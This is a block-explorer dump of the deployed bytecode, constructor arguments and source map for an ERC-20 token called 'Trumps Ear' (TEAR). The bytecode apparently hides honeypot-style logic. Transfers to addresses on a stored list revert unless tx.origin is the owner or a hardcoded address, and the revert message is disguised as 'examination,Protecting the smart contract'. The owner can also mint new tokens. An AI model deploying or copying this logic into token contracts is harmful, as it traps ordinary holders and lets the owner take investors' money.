f3565b46305f801b5f67ffffffffffffffff81111561063d5761063c611fac565b5b60405190808252806020026020018201604052801561066b5781602001602082028036833780820191505090505b507f0f00000000000000000000000000000000000000000000000000000000000000959493929190965096509650965096509650965090919293949596565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546106e090611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461070c90611f1c565b80156107575780601f1061072e57610100808354040283529160200191610757565b820191905f5260205f20905b81548152906001019060200180831161073a57829003601f168201915b5050505050905090565b5f8061076b610c39565b90505f610778828661093d565b9050838110156107bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107b490612049565b60405180910390fd5b6107ca8286868403610c40565b60019250505092915050565b5f806107e0610c39565b90506107ed818585610e8e565b600191505092915050565b8342111561083d57836040517f627913020000000000000000000000000000000000000000000000000000000081526004016108349190611b2c565b60405180910390fd5b5f7f6e71edae12b1b97f4d1f60370fef10105fa2faae0126114a169c64845d6126c988888861086b8c61132e565b8960405160200161088196959493929190612067565b6040516020818303038152906040528051906020012090505f6108a382611381565b90505f6108b28287878761139a565b90508973ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161461092657808a6040517f4b800e4600000000000000000000000000000000000000000000000000000000815260040161091d9291906120c6565b60405180910390fd5b6109318a8a8a610c40565b50505050505050505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6109c7610a66565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2c9061215d565b60405180910390fd5b610a3e816111b1565b50565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3273ffffffffffffffffffffffffffffffffffffffff16610a856106aa565b73ffffffffffffffffffffffffffffffffffffffff161480610aab5750610aaa6113c8565b5b610aea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae19061215d565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b51906121c5565b60405180910390fd5b610b6382611420565b8060035f828254610b749190611f79565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c229190611b2c565b60405180910390a3610c355f8383611439565b5050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca590612253565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d13906122e1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610df69190611b2c565b60405180910390a3505050565b5f610e0e848461093d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e885781811015610e7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7190612349565b60405180910390fd5b610e878484848403610c40565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610efc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef3906123d7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6190612465565b60405180910390fd5b610f7382611420565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610ff7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fee906124f3565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e29190611b2c565b60405180910390a36110f5848484611439565b50505050565b5f7f000000000000000000000000d66097f16fbf3fa278dd5a044ae1d86c0a2e5d8173ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff1614801561117657507f000000000000000000000000000000000000000000000000000000000000000146145b156111a3577fdb55b750d2480f975b18e2fdc6d9f6d623ebc064fe82489eed6db3c33904cb2690506111ae565b6111ab61143e565b90505b90565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606112ee60097f5472756d7073204561720000000000000000000000000000000000000000000a6114d390919063ffffffff16565b905090565b6060611329600a7f31000000000000000000000000000000000000000000000000000000000000016114d390919063ffffffff16565b905090565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f815480929190600101919050559050919050565b5f61139361138d6110fb565b83611580565b9050919050565b5f805f806113aa888888886115c0565b9250925092506113ba82826116a7565b829350505050949350505050565b5f733ec9c6d838e0e3c960129300bda7bb93cfc374dc73ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1603611419576001905061141d565b5f90505b90565b61142981611809565b61143657611435610a66565b5b50565b505050565b5f7f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f7f17826557487eedfa0434f703f2af52ea51680e15bb511bc59231e2d412c6e9af7fc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc646306040516020016114b8959493929190612511565b60405160208183030381529060405280519060200120905090565b606060ff5f1b83146114ef576114e8836118b1565b905061157a565b8180546114fb90611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461152790611f1c565b80156115725780601f1061154957610100808354040283529160200191611572565b820191905f5260205f20905b81548152906001019060200180831161155557829003601f168201915b505050505090505b92915050565b5f6040517f190100000000000000000000000000000000000000000000000000000000000081528360028201528260228201526042812091505092915050565b5f805f7f7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0845f1c11156115fc575f60038592509250925061169d565b5f6001888888886040515f815260200160405260405161161f9493929190612562565b6020604051602081039080840390855afa15801561163f573d5f803e3d5ffd5b5050506020604051035190505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611690575f60015f801b9350935093505061169d565b805f805f1b935093509350505b9450945094915050565b5f60038111156116ba576116b96125a5565b5b8260038111156116cd576116cc6125a5565b5b031561180557600160038111156116e7576116e66125a5565b5b8260038111156116fa576116f96125a5565b5b03611731576040517ff645eedf00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60026003811115611745576117446125a5565b5b826003811115611758576117576125a5565b5b0361179c57805f1c6040517ffce698f70000000000000000000000000000000000000000000000000000000081526004016117939190611b2c565b60405180910390fd5b6003808111156117af576117ae6125a5565b5b8260038111156117c2576117c16125a5565b5b0361180457806040517fd78bce0c0000000000000000000000000000000000000000000000000000000081526004016117fb9190611be1565b60405180910390fd5b5b5050565b5f805f90505b6008805490508110156118a6578273ffffffffffffffffffffffffffffffffffffffff1660088281548110611847576118466125d2565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603611893575f9150506118ac565b808061189e906125ff565b91505061180f565b50600190505b919050565b60605f6118bd83611923565b90505f602067ffffffffffffffff8111156118db576118da611fac565b5b6040519080825280601f01601f19166020018201604052801561190d5781602001600182028036833780820191505090505b5090508181528360208201528092505050919050565b5f8060ff835f1c169050601f811115611968576040517fb3512b0c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80915050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156119a857808201518184015260208101905061198d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6119cd82611971565b6119d7818561197b565b93506119e781856020860161198b565b6119f0816119b3565b840191505092915050565b5f6020820190508181035f830152611a1381846119c3565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611a4882611a1f565b9050919050565b611a5881611a3e565b8114611a62575f80fd5b50565b5f81359050611a7381611a4f565b92915050565b5f819050919050565b611a8b81611a79565b8114611a95575f80fd5b50565b5f81359050611aa681611a82565b92915050565b5f8060408385031215611ac257611ac1611a1b565b5b5f611acf85828601611a65565b9250506020611ae085828601611a98565b9150509250929050565b5f8115159050919050565b611afe81611aea565b82525050565b5f602082019050611b175f830184611af5565b92915050565b611b2681611a79565b82525050565b5f602082019050611b3f5f830184611b1d565b92915050565b5f805f60608486031215611b5c57611b5b611a1b565b5b5f611b6986828701611a65565b9350506020611b7a86828701611a65565b9250506040611b8b86828701611a98565b9150509250925092565b5f60ff82169050919050565b611baa81611b95565b82525050565b5f602082019050611bc35f830184611ba1565b92915050565b5f819050919050565b611bdb81611bc9565b82525050565b5f602082019050611bf45f830184611bd2565b92915050565b611c0381611a3e565b82525050565b5f602082019050611c1c5f830184611bfa565b92915050565b5f60208284031215611c3757611c36611a1b565b5b5f611c4484828501611a65565b91505092915050565b5f7fff0000000000000000000000000000000000000000000000000000000000000082169050919050565b611c8181611c4d565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611cb981611a79565b82525050565b5f611cca8383611cb0565b60208301905092915050565b5f602082019050919050565b5f611cec82611c87565b611cf68185611c91565b9350611d0183611ca1565b805f5b83811015611d31578151611d188882611cbf565b9750611d2383611cd6565b925050600181019050611d04565b5085935050505092915050565b5f60e082019050611d515f83018a611c78565b8181036020830152611d6381896119c3565b90508181036040830152611d7781886119c3565b9050611d866060830187611b1d565b611d936080830186611bfa565b611da060a0830185611bd2565b81810360c0830152611db28184611ce2565b905098975050505050505050565b611dc981611b95565b8114611dd3575f80fd5b50565b5f81359050611de481611dc0565b92915050565b611df381611bc9565b8114611dfd575f80fd5b50565b5f81359050611e0e81611dea565b92915050565b5f805f805f805f60e0888a031215611e2f57611e2e611a1b565b5b5f611e3c8a828b01611a65565b9750506020611e4d8a828b01611a65565b9650506040611e5e8a828b01611a98565b9550506060611e6f8a828b01611a98565b9450506080611e808a828b01611dd6565b93505060a0611e918a828b01611e00565b92505060c0611ea28a828b01611e00565b91505092959891949750929550565b5f8060408385031215611ec757611ec6611a1b565b5b5f611ed485828601611a65565b9250506020611ee585828601611a65565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611f3357607f821691505b602082108103611f4657611f45611eef565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611f8382611a79565b9150611f8e83611a79565b9250828201905080821115611fa657611fa5611f4c565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61203360258361197b565b915061203e82611fd9565b604082019050919050565b5f6020820190508181035f83015261206081612027565b9050919050565b5f60c08201905061207a5f830189611bd2565b6120876020830188611bfa565b6120946040830187611bfa565b6120a16060830186611b1d565b6120ae6080830185611b1d565b6120bb60a0830184611b1d565b979650505050505050565b5f6040820190506120d95f830185611bfa565b6120e66020830184611bfa565b9392505050565b7f6578616d696e6174696f6e2c50726f74656374696e672074686520736d6172745f8201527f20636f6e74726163740000000000000000000000000000000000000000000000602082015250565b5f61214760298361197b565b9150612152826120ed565b604082019050919050565b5f6020820190508181035f8301526121748161213b565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6121af601f8361197b565b91506121ba8261217b565b602082019050919050565b5f6020820190508181035f8301526121dc816121a3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61223d60248361197b565b9150612248826121e3565b604082019050919050565b5f6020820190508181035f83015261226a81612231565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6122cb60228361197b565b91506122d682612271565b604082019050919050565b5f6020820190508181035f8301526122f8816122bf565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f612333601d8361197b565b915061233e826122ff565b602082019050919050565b5f6020820190508181035f83015261236081612327565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6123c160258361197b565b91506123cc82612367565b604082019050919050565b5f6020820190508181035f8301526123ee816123b5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61244f60238361197b565b915061245a826123f5565b604082019050919050565b5f6020820190508181035f83015261247c81612443565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6124dd60268361197b565b91506124e882612483565b604082019050919050565b5f6020820190508181035f83015261250a816124d1565b9050919050565b5f60a0820190506125245f830188611bd2565b6125316020830187611bd2565b61253e6040830186611bd2565b61254b6060830185611b1d565b6125586080830184611bfa565b9695505050505050565b5f6080820190506125755f830187611bd2565b6125826020830186611ba1565b61258f6040830185611bd2565b61259c6060830184611bd2565b95945050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f61260982611a79565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361263b5761263a611f4c565b5b60018201905091905056fea26469706673582212208c6c5efd5a070f78025e05678ee8a90748cd57ffede4234cc73c72ed24148bd964736f6c63430008140033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000005f5e100000000000000000000000000000000000000000000000000000000000000000a5472756d7073204561720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045445415200000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : _tokenName (string): Trumps Ear
Arg [1] : _tokenSymbol (string): TEAR
Arg [2] : _mintAmount (uint256): 100000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 0000000000000000000000000000000000000000000000000000000005f5e100
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [4] : 5472756d70732045617200000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 5445415200000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
36822:449:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29559:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37149:105;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30515:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29889:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30729:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29784:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36496:114;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31002:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29332:33;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30010:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26473:103;;;:::i;:::-;;36340:145;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19876:580;;;:::i;:::-;;;;;;;;;;;;;:::i;:::-;;;;;;;;26205:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29672:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31394:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30150:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35631:695;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30351:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26589:204;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29372:19;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29559:100;29613:13;29646:5;29639:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29559:100;:::o;37149:105::-;26161:10;:8;:10::i;:::-;37224:22:::1;37235:2;37239:6;37224:10;:22::i;:::-;37149:105:::0;;:::o;30515:201::-;30598:4;30615:13;30631:12;:10;:12::i;:::-;30615:28;;30654:32;30663:5;30670:7;30679:6;30654:8;:32::i;:::-;30704:4;30697:11;;;30515:201;;;;:::o;29889:108::-;29950:7;29977:12;;29970:19;;29889:108;:::o;30729:261::-;30826:4;30843:15;30861:12;:10;:12::i;:::-;30843:30;;30884:38;30900:4;30906:7;30915:6;30884:15;:38::i;:::-;30933:27;30943:4;30949:2;30953:6;30933:9;:27::i;:::-;30978:4;30971:11;;;30729:261;;;;;:::o;29784:92::-;29842:5;29867:1;29860:8;;29784:92;:::o;36496:114::-;36555:7;36582:20;:18;:20::i;:::-;36575:27;;36496:114;:::o;31002:238::-;31090:4;31107:13;31123:12;:10;:12::i;:::-;31107:28;;31146:64;31155:5;31162:7;31199:10;31171:25;31181:5;31188:7;31171:9;:25::i;:::-;:38;;;;:::i;:::-;31146:8;:64::i;:::-;31228:4;31221:11;;;31002:238;;;;:::o;29332:33::-;;;;;;;;;;;;;:::o;30010:127::-;30084:7;30111:9;:18;30121:7;30111:18;;;;;;;;;;;;;;;;30104:25;;30010:127;;;:::o;26473:103::-;26161:10;:8;:10::i;:::-;26538:30:::1;26565:1;26538:18;:30::i;:::-;26473:103::o:0;36340:145::-;36431:7;36458:19;36471:5;36458:12;:19::i;:::-;36451:26;;36340:145;;;:::o;19876:580::-;19979:13;20007:18;20040:21;20076:15;20106:25;20146:12;20173:27;20281:13;:11;:13::i;:::-;20309:16;:14;:16::i;:::-;20340:13;20376:4;20404:1;20396:10;;20435:1;20421:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;20228:220;;;;;;;;;;;;;;;;;;;;;19876:580;;;;;;;:::o;26205:87::-;26251:7;26278:6;;;;;;;;;;;26271:13;;26205:87;:::o;29672:104::-;29728:13;29761:7;29754:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29672:104;:::o;31394:436::-;31487:4;31504:13;31520:12;:10;:12::i;:::-;31504:28;;31543:24;31570:25;31580:5;31587:7;31570:9;:25::i;:::-;31543:52;;31634:15;31614:16;:35;;31606:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;31727:60;31736:5;31743:7;31771:15;31752:16;:34;31727:8;:60::i;:::-;31818:4;31811:11;;;;31394:436;;;;:::o;30150:193::-;30229:4;30246:13;30262:12;:10;:12::i;:::-;30246:28;;30285;30295:5;30302:2;30306:6;30285:9;:28::i;:::-;30331:4;30324:11;;;30150:193;;;;:::o;35631:695::-;35861:8;35843:15;:26;35839:99;;;35917:8;35893:33;;;;;;;;;;;:::i;:::-;;;;;;;;35839:99;35950:18;35324:95;36009:5;36016:7;36025:5;36032:16;36042:5;36032:9;:16::i;:::-;36050:8;35981:78;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;35971:89;;;;;;35950:110;;36073:12;36088:28;36105:10;36088:16;:28::i;:::-;36073:43;;36129:14;36146:28;36160:4;36166:1;36169;36172;36146:13;:28::i;:::-;36129:45;;36199:5;36189:15;;:6;:15;;;36185:90;;36249:6;36257:5;36228:35;;;;;;;;;;;;:::i;:::-;;;;;;;;36185:90;36287:31;36296:5;36303:7;36312:5;36287:8;:31::i;:::-;35828:498;;;35631:695;;;;;;;:::o;30351:151::-;30440:7;30467:11;:18;30479:5;30467:18;;;;;;;;;;;;;;;:27;30486:7;30467:27;;;;;;;;;;;;;;;;30460:34;;30351:151;;;;:::o;26589:204::-;26161:10;:8;:10::i;:::-;26698:1:::1;26678:22;;:8;:22;;::::0;26670:76:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;26757:28;26776:8;26757:18;:28::i;:::-;26589:204:::0;:::o;29372:19::-;;;;;;;;;;;;;:::o;26305:155::-;26377:9;26366:20;;:7;:5;:7::i;:::-;:20;;;:40;;;;26390:16;:14;:16::i;:::-;26366:40;26358:94;;;;;;;;;;;;:::i;:::-;;;;;;;;;26305:155::o;32812:434::-;32920:1;32901:21;;:7;:21;;;32893:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;32971:29;32992:7;32971:20;:29::i;:::-;33029:6;33013:12;;:22;;;;;;;:::i;:::-;;;;;;;;33107:6;33085:9;:18;33095:7;33085:18;;;;;;;;;;;;;;;;:28;;;;;;;;;;;33161:7;33140:37;;33157:1;33140:37;;;33170:6;33140:37;;;;;;:::i;:::-;;;;;;;;33190:48;33218:1;33222:7;33231:6;33190:19;:48::i;:::-;32812:434;;:::o;25509:98::-;25562:7;25589:10;25582:17;;25509:98;:::o;33998:346::-;34117:1;34100:19;;:5;:19;;;34092:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;34198:1;34179:21;;:7;:21;;;34171:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;34282:6;34252:11;:18;34264:5;34252:18;;;;;;;;;;;;;;;:27;34271:7;34252:27;;;;;;;;;;;;;;;:36;;;;34320:7;34304:32;;34313:5;34304:32;;;34329:6;34304:32;;;;;;:::i;:::-;;;;;;;;33998:346;;;:::o;34358:419::-;34459:24;34486:25;34496:5;34503:7;34486:9;:25::i;:::-;34459:52;;34546:17;34526:16;:37;34522:248;;34608:6;34588:16;:26;;34580:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;34692:51;34701:5;34708:7;34736:6;34717:16;:25;34692:8;:51::i;:::-;34522:248;34448:329;34358:419;;;:::o;32148:642::-;32261:1;32245:18;;:4;:18;;;32237:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;32338:1;32324:16;;:2;:16;;;32316:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;32395:24;32416:2;32395:20;:24::i;:::-;32432:19;32454:9;:15;32464:4;32454:15;;;;;;;;;;;;;;;;32432:37;;32503:6;32488:11;:21;;32480:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;32620:6;32606:11;:20;32588:9;:15;32598:4;32588:15;;;;;;;;;;;;;;;:38;;;;32671:6;32654:9;:13;32664:2;32654:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;32721:2;32706:26;;32715:4;32706:26;;;32725:6;32706:26;;;;;;:::i;:::-;;;;;;;;32745:37;32765:4;32771:2;32775:6;32745:19;:37::i;:::-;32226:564;32148:642;;;:::o;19214:268::-;19267:7;19308:11;19291:28;;19299:4;19291:28;;;:63;;;;;19340:14;19323:13;:31;19291:63;19287:188;;;19378:22;19371:29;;;;19287:188;19440:23;:21;:23::i;:::-;19433:30;;19214:268;;:::o;27502:191::-;27576:16;27595:6;;;;;;;;;;;27576:25;;27621:8;27612:6;;:17;;;;;;;;;;;;;;;;;;27676:8;27645:40;;27666:8;27645:40;;;;;;;;;;;;27565:128;27502:191;:::o;368:109::-;428:7;455;:14;463:5;455:14;;;;;;;;;;;;;;;;448:21;;368:109;;;:::o;20469:128::-;20515:13;20548:41;20575:13;20548:5;:26;;:41;;;;:::i;:::-;20541:48;;20469:128;:::o;20609:137::-;20658:13;20691:47;20721:16;20691:8;:29;;:47;;;;:::i;:::-;20684:54;;20609:137;:::o;490:170::-;550:7;625;:14;633:5;625:14;;;;;;;;;;;;;;;;:16;;;;;;;;;;;;618:23;;490:170;;;:::o;19684:178::-;19761:7;19788:66;19821:20;:18;:20::i;:::-;19843:10;19788:32;:66::i;:::-;19781:73;;19684:178;;;:::o;24113:264::-;24198:7;24219:17;24238:18;24258:16;24278:25;24289:4;24295:1;24298;24301;24278:10;:25::i;:::-;24218:85;;;;;;24314:28;24326:5;24333:8;24314:11;:28::i;:::-;24360:9;24353:16;;;;;24113:264;;;;;;:::o;26801:651::-;26849:4;27169:48;26901:472;;:9;:472;;;26898:503;;27395:4;27388:11;;;;26898:503;27409:5;27402:12;;26801:651;;:::o;34785:92::-;34850:9;34856:2;34850:5;:9::i;:::-;34846:29;;34863:10;:8;:10::i;:::-;34846:29;34785:92;:::o;34890:90::-;;;;:::o;19490:181::-;19545:7;18243:95;19604:11;19617:14;19633:13;19656:4;19582:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;19572:91;;;;;;19565:98;;19490:181;:::o;6477:273::-;6571:13;5071:66;6630:17;;6620:5;6601:46;6597:146;;6671:15;6680:5;6671:8;:15::i;:::-;6664:22;;;;6597:146;6726:5;6719:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6477:273;;;;;:::o;17552:374::-;17645:14;17721:4;17715:11;17752:10;17747:3;17740:23;17800:15;17793:4;17788:3;17784:14;17777:39;17853:10;17846:4;17841:3;17837:14;17830:34;17903:4;17898:3;17888:20;17878:30;;17689:230;17552:374;;;;:::o;22967:1132::-;23108:7;23117:12;23131:7;23520:77;23265:1;23257:10;;:481;23253:588;;;23791:1;23795:30;23827:1;23775:54;;;;;;;;23253:588;23863:14;23880:24;23890:4;23896:1;23899;23902;23880:24;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23863:41;;23937:1;23919:20;;:6;:20;;;23915:115;;23972:1;23976:29;24015:1;24007:10;;23956:62;;;;;;;;;23915:115;24050:6;24058:20;24088:1;24080:10;;24042:49;;;;;;;22967:1132;;;;;;;;;:::o;24391:519::-;24487:20;24478:29;;;;;;;;:::i;:::-;;:5;:29;;;;;;;;:::i;:::-;;;24474:429;24524:7;24474:429;24562:29;24553:38;;;;;;;;:::i;:::-;;:5;:38;;;;;;;;:::i;:::-;;;24549:354;;24615:23;;;;;;;;;;;;;;24549:354;24669:35;24660:44;;;;;;;;:::i;:::-;;:5;:44;;;;;;;;:::i;:::-;;;24656:247;;24764:8;24756:17;;24728:46;;;;;;;;;;;:::i;:::-;;;;;;;;24656:247;24805:30;24796:39;;;;;;;;:::i;:::-;;:5;:39;;;;;;;;:::i;:::-;;;24792:111;;24882:8;24859:32;;;;;;;;;;;:::i;:::-;;;;;;;;24792:111;24391:519;;;:::o;31884:250::-;31941:4;31964:6;31973:1;31964:10;;31960:143;31980:7;:14;;;;31976:1;:18;31960:143;;;32033:10;32019:24;;:7;32027:1;32019:10;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;:24;;;32016:76;;32071:5;32064:12;;;;;32016:76;31996:3;;;;;:::i;:::-;;;;31960:143;;;;32120:4;32113:11;;31884:250;;;;:::o;5528:310::-;5587:13;5613:11;5627:16;5638:4;5627:10;:16::i;:::-;5613:30;;5664:17;5695:2;5684:14;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5664:34;;5753:3;5748;5741:16;5794:4;5787;5782:3;5778:14;5771:28;5827:3;5820